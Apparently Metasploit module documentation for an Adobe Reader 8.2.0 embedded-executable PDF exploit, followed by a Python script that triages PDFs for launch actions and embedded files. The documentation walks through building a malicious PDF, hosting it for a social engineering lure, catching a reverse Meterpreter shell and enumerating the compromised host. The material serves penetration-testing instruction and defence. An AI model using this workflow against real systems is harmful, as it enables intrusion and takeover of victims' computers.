Vulnerable Application

This module embeds a Metasploit payload into an existing PDF file. The resulting PDF can be sent to a target as part of a social engineering attack.

Link to vulnerable software: [OldVersion](http://www.oldversion.com/windows/download/acrobat-reader-8-2-0)

Verification Steps

  1. Install the application on the target machine
  2. Start msfconsole
  3. Do: use exploit/windows/fileformat/adobe_pdf_embedded_exe
  4. Do: set payload [windows/meterpreter/reverse_tcp]
  5. Do: set LHOST [IP]
  6. Do: exploit
  7. Do: use [exploit/multi/handler]
  8. Do: set LHOST [IP]
  9. Do: exploit
  10. Do: Open PDF on target machine with vulnerable software

Scenarios

A run on Adobe Reader 8.2.0 and Windows XP (5.1 Build 2600, Service Pack 3)

msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe
msf exploit(windows/fileformat/adobe_pdf_embedded_exe) > set payload windows/meterpreter/reverse_tcp
  payload => windows/meterpreter/reverse_tcp
msf exploit(windows/fileformat/adobe_pdf_embedded_exe) > set LHOST 192.168.1.3
  LHOST => 192.168.1.3
msf exploit(windows/fileformat/adobe_pdf_embedded_exe) > exploit

  [*] Reading in '/usr/share/metasploit-framework/data/exploits/CVE-2010-1240/template.pdf'...
  [*] Parsing '/usr/share/metasploit-framework/data/exploits/CVE-2010-1240/template.pdf'...
  [*] Using 'windows/meterpreter/reverse_tcp' as payload...
  [+] Parsing Successful. Creating 'evil.pdf' file...
  [+] evil.pdf stored at /root/.msf4/local/evil.pdf
msf5 exploit(windows/fileformat/adobe_pdf_embedded_exe) > cp /root/.msf4/local/evil.pdf /var/www/html/evil.pdf
  [*] exec: cp /root/.msf4/local/evil.pdf /var/www/html/evil.pdf

msf exploit(windows/fileformat/adobe_pdf_embedded_exe) > use exploit/multi/handler
msf exploit(multi/handler) > set LHOST 192.168.1.3
  LHOST => 192.168.1.3
msf5 exploit(multi/handler) > exploit

  [*] Started reverse TCP handler on 192.168.1.3:4444
  [*] Sending stage (180291 bytes) to 192.168.1.5
  [*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.5:1121) at 2019-12-09 14:17:10 -0700

meterpreter > sysinfo
  Computer        : COMPUTER_1
  OS              : Windows XP (5.1 Build 2600, Service Pack 3).
  Architecture    : x86
  System Language : en_US
  Domain          : WORKGROUP
  Logged On Users : 2
  Meterpreter     : x86/windows
meterpreter > getuid
  Server username: COMPUTER_1\USER
meterpreter > run post/windows/gather/enum_applications

  [*] Enumerating applications installed on COMPUTER_1

    Installed Applications
    ======================

    Name                Version
    ----                -------
    Adobe Reader 8.2.0  8.2.0



    [+] Results stored in: /root/.msf4/loot/20191209141758_default_192.168.1.5_host.application_783490.txt
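
As a defender-side companion to the run above, the following added example (not part of this documentation or of the Metasploit project) triages a PDF for the object names a document carrying an embedded, auto-launched file relies on, including names hidden behind `#xx` escapes or inside Flate-compressed streams. The name list, the `triage` and `verdict` helpers, the sample bytes and the block/review policy are assumptions made for illustration.

```python
import re
import zlib

# Name tokens to flag; the block/review policy in verdict() is an assumption.
SUSPICIOUS = ("/Launch", "/EmbeddedFile", "/JavaScript", "/JS", "/OpenAction", "/AA")
NAME_RE = re.compile(rb"/[^\x00\t\n\f\r ()<>\[\]{}/%]+")
STREAM_RE = re.compile(rb"stream\r?\n(.*?)endstream", re.S)

# Constructed samples (object fragments, not real documents).
BENIGN = b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog /Pages 2 0 R >>\nendobj\n"
LAUNCH = (b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog /OpenAction 3 0 R >>\nendobj\n"
          b"3 0 obj\n<< /Type /Action /S /L#61unch >>\nendobj\n")

def decode_name(raw: bytes) -> str:
    """Undo #xx hex escapes so /L#61unch is counted as /Launch."""
    out = re.sub(rb"#([0-9A-Fa-f]{2})", lambda m: bytes([int(m.group(1), 16)]), raw)
    return out.decode("latin-1")

def inflate_streams(data: bytes) -> bytes:
    """Inflate every Flate-compressed stream body; skip the rest."""
    parts = []
    for m in STREAM_RE.finditer(data):
        try:
            # decompressobj tolerates the end-of-line bytes before 'endstream'
            parts.append(zlib.decompressobj().decompress(m.group(1)))
        except zlib.error:
            continue
    return b"\n".join(parts)

def triage(data: bytes) -> dict:
    """Count suspicious names in the raw bytes and inside inflated streams."""
    counts = dict.fromkeys(SUSPICIOUS, 0)
    for blob in (data, inflate_streams(data)):
        for m in NAME_RE.finditer(blob):
            name = decode_name(m.group(0))
            if name in counts:
                counts[name] += 1
    return counts

def verdict(counts: dict) -> str:
    """Assumed policy: any /Launch blocks; embedded file plus script is reviewed."""
    if counts["/Launch"]:
        return "block"
    if counts["/EmbeddedFile"] and (counts["/JavaScript"] or counts["/JS"]):
        return "review"
    return "pass"

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN), ("launch", LAUNCH)):
        print(label, verdict(triage(sample)), triage(sample))
```

Matching on name tokens rather than parsing the full object graph keeps the check fast enough for a mail gateway, at the cost of false positives on legitimate forms that use JavaScript.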